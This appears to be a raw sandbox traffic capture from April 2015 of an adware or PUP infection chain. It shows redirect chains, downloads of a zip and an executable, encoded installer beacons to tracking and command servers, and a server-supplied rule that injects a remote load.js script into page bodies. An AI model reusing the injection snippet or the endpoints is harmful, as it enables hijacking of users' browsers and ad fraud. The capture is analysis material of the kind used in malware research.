User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip
0......
GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-21bcc4"
Accept-Ranges: bytes
PK...........F.v9t............479.json.....qv.B..[.:?..y....xL..@a......w..sN.....^.9....'.t.."....u...........N5..g(.......{.)..Q.!..Dk..zef....s.{.kM.S.*:.......6|.&...M..ZWYr.....uA....R/..,...0..........g..]V3..n.`...}..g_j.......i.n..;.........Ts..C......o.l.'7u..........l...z.ZJ......S"Z....f....W..m..^....$m.=...O.Z...k.=..i...`_...;......kV........V..8?V.;...*......EF...^'...?*..n.r&....o..wv..}\S.,......N....4.w...6.......:....s..)......C.eg..4..........~........P.F.E.i....0......c.....9..feKn.q.x......y...................". /..PK...........F.........<......uninstallDlg2.xml.[m..6..~@..........v.b.....4..Z..".%.fW&U......7.(Y...\s.].v.X.4.....3b..._%....r6...m!.".S..Z...gl.Lb...32..Hf..^.....)........O..;q-..T.....z6.......s.p1.>.........|....1..Y......%; t..xjI...Q...M.9N2.<;@.~.p....\..A....\..u.....Q%...u..e.... ..'9\........\~.. .!I......v....x.t_D.$Bw0.V.......4..8...Es....0L..lF..ET..8... p.k-x..qR.....~Kn.gK..'.d....%;...%GK..B.k.[.w....H.$y.Em.R...:Y.....l.v#..(.d.....ntgA....4.j.{m.W.3V.=.O(.c....P.WT:X.?2.E.....>..k...=......7b~.]..`.....(.............2_.L......:@...F...M......1..".9X.....c.!3H%...d...41E2./H...p....R.3........1`.......@....W.......2.....e..1n.,.-C..2..)f....M.@...N...<....r9..../.],!.*...M9..cO.h..c..Fr..`......3....<..Q....V.*.~.....5....S...I..nj..Q.A.. .....bn.2!.9$ .....U%.....p....v.-*.. *C7{...F......4wj..2...2.k....tU'63....r.m.~............a.S....W..V ...z..u.~.s...gg...Z\q..'F.8..Rm..V.kT.. E^X)j..QU*>y..\.j.....$...x.=.....kI.-..p.......:....
<<< skipped >>>
GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>..HTTP/1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:25 GMT..Content-Type: text/html..Content-Length: 185..Connection: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>....
GET /Bw14Po HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: goo.gl
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 23 Apr 2015 07:24:21 GMT
Location: hXXp://VVV.4threquest.me/registro/310113f8.htm
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 191
Server: GSE
Alternate-Protocol: 80:quic,p=1
..........m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_..........3..u.}.z.. ....HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Cache-Control: no-cache, no-store, max-age=0, must-revalidate..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Date: Thu, 23 Apr 2015 07:24:21 GMT..Location: hXXp://VVV.4threquest.me/registro/310113f8.htm..Content-Encoding: gzip..X-Content-Type-Options: nosniff..X-Frame-Options: SAMEORIGIN..X-XSS-Protection: 1; mode=block..Content-Length: 191..Server: GSE..Alternate-Protocol: 80:quic,p=1............m....0.D.|ES.T..cJ.."&...A.DVkbAK.......lvv2yKsQ...9.S;.^.....Zt....:s.S.=x...I..P..VEUGx.9a$.Q.u....._.u=!...yT.C...r9....Y..1..!.4. #5<G....h....{... ./k_..........3..u.}.z.. ......
GET /registro/top-line.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 1724
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............. .........\.0!....B....A...f..qcE. -..8..D..-...0...)..d......I.T.R.K..aJ.Z3.O.-w.\*s...MgvD.....E..$..aW.Z.&M.....O.B..0$J.....K....x.....o_.~...L.0..u..Ulx....#..LY2..y![...q......MZ......^..4...c.V.:5m..]..Mz....E.....l..M..M.6...e.^N..t..QSG^.....wC.g^......k.~.x........>.............( ....`.......1.........M(..... .......^X....."...x..(V...... ...Xb.0....0.h_.-....D.i..H&...L6...PF)..TVi..Xf...\v...`v.@...y..e.y..l.9&.f....t.Y..o.yg.x.Y.....g......v....p.z..|6...w..h..R....*...j:.....)....I*.......r.....F.....*.........Zk........Kj....(..D ...L[...R.m.gn.@.......j.-..z.-....n...k...............n...{....;........'.........:.p....p...|...Z.1..{,.......,....0....3?Ps. .|3.9..s.;....:.M..H'Ms.H..4.N..5.OS]u.6g]..=.<.
<<< skipped >>>
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:26 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.30..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..X-Cache: BYPASS..CC: UA..Content-Encoding: gzip..18............s.......X.......0..
GET /services/rules.txt?dummy=534 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT
ETag: "5a246f5-10-50b4a12f3b440"
Accept-Ranges: bytes
Content-Length: 16
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:37 GMT
P3P: CP="Potato"
X-Cache: BYPASS
</body>|</body>.HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:37 GMT..Content-Type: text/plain..Connection: keep-alive..Last-Modified: Sun, 28 Dec 2014 17:27:37 GMT..ETag: "5a246f5-10-50b4a12f3b440"..Accept-Ranges: bytes..Content-Length: 16..Cache-Control: max-age=600..Expires: Thu, 23 Apr 2015 07:34:37 GMT..P3P: CP="Potato"..X-Cache: BYPASS..</body>|</body>.....
GET /services/update.php?v=1.0.0&key=DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw&dummy=112 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gosaferllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
inactive..
GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:53 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>..HTTP/1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:53 GMT..Content-Type: text/html..Content-Length: 185..Connection: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>....
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.wpm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 2015 07:24:48 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0......
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action=pcm.installer.istartsurf.ient HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.76 ms","message":"store 1 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 2015 07:24:54 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.76 ms","message":"store 1 action and 0 update "}..0..
GET /mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.14
Content-Length: 0
Connection: close
Content-Type: text/html
POST /tdownload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.downloadcrest.com
Content-Length: 106
Connection: Keep-Alive
version=1.1.2.41&s1=57a0c198e2d39f18102a94c10225f3efec999268&t1=1429774025&campid=9664&prefix=amisetup5755
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup5755__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 23 Apr 2015 07:24:05 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup5755__9664.exe
Content-Length: 1397248
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.................9......,?.......%.....j.........".......2..............,..`....,.......,;......,<.....Rich....................PE..L.....8U..........................................@.......................... ............@......................................................................i..0A..............................................t................................textbssG`...............................text............................... ..`.rdata.......0......................@..@.data....n...@...@..................@....idata...".......$..................@....rsrc...............................@..@.reloc..U~..........................@..B......................................................................................................................................................................................................................................................6S...Zg........w2.............X..........3....N...TO.........%..................<4...Q.....K....b...2..........R...S-...n..... ......../b...?.......................................2}...SO...x>.............Y.........N..............`....K>...V~........$....g.....}.............S,.........`...T....F.....E....3...p.....q....^.........?...B....D3...l....]..............i.........O...."....b...............]..............H........-@....L....*....6....c...$&...73...*..........}........f:....p.......
<<< skipped >>>
GET /services/rules?dummy=212 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:15 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:15 GMT
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>.{cashReminder_instID}|{instID}.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:15 GMT..Content-Type: text/plain..Content-Length: 265..Connection: keep-alive..Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT..ETag: "5d60ef-109-50e71dec37cc0"..Cache-Control: max-age=600..Expires: Thu, 23 Apr 2015 07:34:15 GMT..P3P: CP="Potato"..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Origin: *..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: EU..Accept-Ranges: bytes..</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>.{cashReminder_instID}|{instID}.....
<<< skipped >>>
GET /services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:16 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:16 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Origin: *..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: EU..
GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=xa.geoip&action2=visit&action3=pcm.visit.istartsurf&update1=ref,pcm&update2=identifier,installer&update3=version,6.3.7602.2008&update4=nation,us&update5=language,en HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 23 Apr 2015 07:24:03 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
Content-Encoding: gzip
57.............V*.I,)V.R..V.Q*..M....,..r......... .....T........<.....S......T..Z.b.O(H.....0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 23 Apr 2015 07:24:03 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..Content-Encoding: gzip..57.............V*.I,)V.R..V.Q*..M....,..r......... .....T........<.....S......T..Z.b.O(H.....0..
GET /mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:07 GMT
Content-Length: 2004
hHqI6zfbRv25fbMBtZdokyLM4zjRbdf8fOBN3rshiiPI73aYRt2PU5RA75EbynCf/hrAVPTjZ/sVutNU/EOYmASoOp pdaZ5wKogpyad0HGqCs3vKdQmjsJ0nnj /H7CXZa3IM0UzswFw23qvDuNfofgDthQ vsg0DyM5GXUe5K6Ha8t2P1vkHrC8nCuJbzWYLg3yuMtxwyFwmSpBoD/et5ogeEgiEXc2gbEbIbnMIkwzutXllmuuCbcbtPzY8R6ufcK CGe5TvcJoL8JrE6q5c/1B712QyAY8/XZrZMmKM54WKXpGyVU8rDCNp7 IEGmjPe6wjHHJu2K8E4hvUznT2yuh2vLbSmbIA0lLAnpCbil2COJtvpL8cru8Zrt0GYo3XHd4jhIIdZys4M GnQtCCNH9XrGN8e7L8kxD MqzPYbKCsHqgs2P1nhHrdu37qL7bUZoJ0hP4p1yqQi3zgTd67IYsqyO92mEbdj1OUQO OAcpwn/4awFT042f7NZruf8V6trUQtjumm1KRZMewNbto4pdzlzrL7xXDIoiFPaxR1vU3kH6cvWeCQt3JP9dk0bh00jLI4heYHrC2N8spp Zl2GmhmBm/K5HlO4N3wq035GinxmGBOczueZgpjMt0pwiY/GPTeJDvOJVEzcgUmnOGtDLKZoS8V5ZIr6kginbLz1riSOb3U6opjq8j3zT9pyGhJLrQd5g30vkH/g6Y02iQUdTqOZ45kqxulFP2zATTKp6zI4QwkawezEyzujHNKL/mfcR65uEfrySW6yODedy9N4YrutxzkxXW7zjJbdfBZq5X37U522iAum2TUpqXD9dk17h6yjnF7xjAHuytN90plKtqk3ag Uvje9bldZxmy/xo6gKF5lLUepz6OtYnz50lkV3J8HXGfpajY41F5PE5xGfHmSOFLJ iWcJduqwg5i2E4jOLcbG3HfZqn79xgHXauzaeK6LAYNRs0P83zmPPwWiwR9/XesZykqhBiVPbxkuMbsWxJY1wn cI0Eu5qyGKdo/mfcJ66PkUoimZsyPfYtyrN7VmtZdsknSEs2 ObZned6cGgLtT Uiz7y7DRtnZAZQyhpA/iy7S/RTSSIqFEsEijehmwkOYmASoOp pdbNz3K07pySS6VCYP9D5L8Mjgftbg0rO8FfdfIOocMMamtsI2n3BkzeFOZ 0FcFQuvVnzTSZ4nLFeqCNELY9n U7i2PCsn7qLKHHZpMY3/4y1Cquz2KhT5ijfdN3l6guw1/LyR7ZesD/bI490f0emB6zoSTLOMu9ZcNqoaZdoWqToyPfJ57sfuo t8Vg1GycwhDxGM LJbJFzvE5iDmppGGTWcvCD8JU Io/hjjS QjoYJWsN9oph/NH1G23sh60FKaSb4x43aozpCaS6VKfJNv5M8M9hoUr4FLb9W7XVYWgZ8MM1tgF2iSGuC6YOd76HtBqt7UwzW7T6WTdc j5F7U6maJPhGLHqDeLIqvWbtRs2Os30SrBhW6xQM32adY53qtjjUXdgUvTcMW Ispm
<<< skipped >>>
GET /fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:20 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP002C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Thu, 23 Apr 2015 07:24:20 GMT..Content-Length: 0......
GET /ii?alpha=U2xSOyMpaRAdPUgWfREsUigBNiNTMF4TLnZUE29sDGkDO3dGUF8tEQB3EC0RXjwOMAgQDGV/NA0TV2o3VjgrJVU5cBEhOwMzQT50KXp9FixQITs5KQYpBhVhM0EHdDhdP3peIQISTzxPJVtTOXR6fEocLiAYIU1jSWh3FTxTSFs4JCszViohFHZJPHYuaTpVJQ9xUnR+RmwHRSUzVgUvTRdiA3RzTlAOEg8EOBpoJH04CAhSVQQ8J2NGagN5MFM4LC0CaDFseHYPVScoKWwobRV0HBcNNCsaLkRbMyYATStmEStRbmBTUl8wFAJsEX4tWT5HCQYNTmN+Il8CY3dVFGZ4bhZ+N095dF4gAms0bDV7CzEbYFF0fltrAUcjNUEFO3kMbls9ZldDCV1HQS1QPWRQOQs/AQQXSWc2EzNAPyVOXHBiEWg6AERhU3QRfW85MmJYJQcuVipyDH9WAS4sAkx4P1crU3wrBhBYTT5bLEc3cXlwJGdVUBoqeT4bZ3U2aRVsOG8KYDAdU1ttTjUoInAxd1hVYh8qG2kRLQohXmJTEiwvM2RMaWNXTEI0OSQ+NmwwW2ojLAYVTyp5OkJ8VjlmWzg4cVg8QyJiPCYQEA== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP002C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 23 Apr 2015 07:24:21 GMT
Content-Length: 84
UDRT22FabhHfFE9XbqcgVnkRz35UOxTWE1k4NYthRCBNkXYPFhbxU05kEohzT3MB2w9aHHiFfwGZVo8qEok6HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP002C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Thu, 23 Apr 2015 07:24:21 GMT..Content-Length: 84..UDRT22FabhHfFE9XbqcgVnkRz35UOxTWE1k4NYthRCBNkXYPFhbxU05kEohzT3MB2w9aHHiFfwGZVo8qEok6....
POST /if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
